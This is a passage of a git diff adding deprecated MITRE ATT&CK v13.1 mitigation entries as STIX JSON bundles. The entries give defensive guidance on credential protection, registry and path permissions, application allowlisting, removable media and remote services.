can be used to obtain credentials through forms of credential dumping. 
It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)\n\nManage the access control list for \u201cReplicating Directory Changes\u201d and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)\n\nConsider disabling or restricting NTLM traffic. (Citation: Microsoft Disable NTLM Nov 2012)\n\n### Linux\nScraping the passwords from memory requires root privileges. Follow best practices in restricting access to escalated privileges to avoid hostile programs from accessing such sensitive regions of memory.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee.json new file mode 100644 index 0000000000000000000000000000000000000000..296bbf54a9b1ec75bcb2a94fcfaa22d33a6792de --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--277a1bde-8b1a-430d-b593-75fac11e949a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1030", + "external_id": "T1030" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T19:05:56.488Z", + "name": "Data Transfer Size Limits Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70.json new file mode 100644 index 0000000000000000000000000000000000000000..2c288fe316f3b3a59658676ec943987e78a48d30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--1796ca61-5106-485c-821f-51fcd0499dcb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70", + "type": "course-of-action", + "created": "2019-02-01T14:35:39.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1480", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1480" + } + ], + "modified": "2019-07-24T19:17:09.258Z", + "name": "Environmental Keying Mitigation", + "description": "This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a.json new file mode 100644 index 0000000000000000000000000000000000000000..6ed596e83dd1ffbbea8b19e546262b1b255b8cfc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--37e63923-06c8-41f0-9cd8-ac5bfdf24684", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1105", + "external_id": "T1105" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-25T11:33:35.477Z", + "name": "Remote File Copy Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2.json new file mode 100644 index 0000000000000000000000000000000000000000..b6c6240ae6303ae53009c5cbd2ef833c4dc0739c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--2e4ebba4-fc07-435e-aa02-8372dd30f734", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1133", + "external_id": "T1133" + } + ], + "modified": "2019-07-24T19:27:15.659Z", + "name": "External Remote Services Mitigation", + "description": "Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Disable or block remotely available services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028). Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--e0703d4f-3972-424a-8277-84004817e024.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--e0703d4f-3972-424a-8277-84004817e024.json new file mode 100644 index 0000000000000000000000000000000000000000..4782b0b70795fc323817841e9becc73882547ad2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--e0703d4f-3972-424a-8277-84004817e024.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--8cba1c08-538f-4075-969c-30004224e47c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--e0703d4f-3972-424a-8277-84004817e024", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1034", + "url": "https://attack.mitre.org/mitigations/T1034", + "source_name": "mitre-attack" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ms682425", + "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", + "source_name": "Microsoft CreateProcess" + }, + { + "source_name": "MSDN DLL Security", + "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/ff919712.aspx" + }, + { + "source_name": "Kanthak Sentinel", + "description": "Kanthak, S. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.", + "url": "https://skanthak.homepage.t-online.de/sentinel.html" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. 
Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + } + ], + "modified": "2021-08-23T20:25:19.363Z", + "name": "Path Interception Mitigation", + "description": "Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security). Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.\n\nPeriodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations (Citation: Kanthak Sentinel). \n\nRequire that all executables be placed in write-protected directories. 
Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.\n\nIdentify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135.json new file mode 100644 index 0000000000000000000000000000000000000000..68a7667bf20e4bccd8ceef61614a54cf73cf9af2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--2d532493-996c-43ca-a0a4-9df85db9883f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1054", + "external_id": "T1054" + }, + { + "url": "https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal", + "description": "Microsoft. (2018, May 30). Event Tracing. Retrieved September 6, 2018.", + "source_name": "Microsoft ETW May 2018" + } + ], + "modified": "2019-07-24T19:39:30.292Z", + "name": "Indicator Blocking Mitigation", + "description": "Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls. Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc.json new file mode 100644 index 0000000000000000000000000000000000000000..2e1aa68aa068ae048c8e6a3c418df31a0ca7ca58 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--1c55bf78-813d-450d-91ab-2021750cbcb4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1112", + "url": "https://attack.mitre.org/mitigations/T1112", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.884Z", + "name": "Modify Registry Mitigation", + "description": "Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [Service Registry Permissions Weakness](https://attack.mitre.org/techniques/T1058). Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.\n\nIdentify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ef273807-c465-4728-9cee-5823422f42ee.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ef273807-c465-4728-9cee-5823422f42ee.json new file mode 100644 index 0000000000000000000000000000000000000000..25ab7ecff27db1272e72caf48d4fc892e4219bcc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ef273807-c465-4728-9cee-5823422f42ee.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--bcaccd62-5d39-4657-b4ed-436e1d01430a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ef273807-c465-4728-9cee-5823422f42ee", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1198", + "external_id": "T1198" + }, + { + "source_name": "SpectorOps Subverting Trust Sept 2017", + "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", + "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf" + } + ], + "modified": "2019-07-25T11:38:03.304Z", + "name": "SIP and Trust Provider Hijacking Mitigation", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Also ensure that these values contain their full path to prevent [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nConsider removing unnecessary and/or stale SIPs. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nRestrict storage and execution of SIP DLLs to protected directories, such as C:\\Windows, rather than user directories.\n\nEnable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs. 
Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e.json new file mode 100644 index 0000000000000000000000000000000000000000..23e141678a409f493950649d8356711d3736fa1e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--342bef7d-e7b3-4763-bfc6-dff1a1611310", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--effb83a0-ead1-4b36-b7f6-b7bdf9c4616e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1091", + "url": "https://attack.mitre.org/mitigations/T1091", + "source_name": "mitre-attack" + }, + { + "source_name": "Microsoft Disable Autorun", + "description": "Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016.", + "url": "https://support.microsoft.com/en-us/kb/967715" + }, + { + "source_name": "TechNet Removable Media Control", + "description": "Microsoft. (2007, August 31). https://technet.microsoft.com/en-us/library/cc771759(v=ws.10).aspx. Retrieved April 20, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. 
Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.877Z", + "name": "Replication Through Removable Media Mitigation", + "description": "Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)\n\nIdentify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f0a42cad-9b1f-44da-a672-718f18381018.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f0a42cad-9b1f-44da-a672-718f18381018.json new file mode 100644 index 0000000000000000000000000000000000000000..c64e31adfba165d8aca1dfb83708a3432ad3393c --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f0a42cad-9b1f-44da-a672-718f18381018.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--db8fe07b-40ad-4c8a-ac56-9302d2b954fd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f0a42cad-9b1f-44da-a672-718f18381018", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1080", + "external_id": "T1080" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + } + ], + "modified": "2021-08-23T20:25:21.481Z", + "name": "Taint Shared Content Mitigation", + "description": "Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).\n\nReduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.\n\nIdentify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e.json new file mode 100644 index 0000000000000000000000000000000000000000..40da2734f4b73f97f2a5697fa1d94b85a747ff5d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--0121c85b-d301-4aed-bb2f-18da6817b354", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1145", + "external_id": "T1145" + } + ], + "modified": "2019-07-25T11:27:03.265Z", + "name": "Private Keys Mitigation", + "description": "Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd.json new file mode 100644 index 0000000000000000000000000000000000000000..ca4ece49f81e14988fab405b37d1263c8e36033b --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd.json 
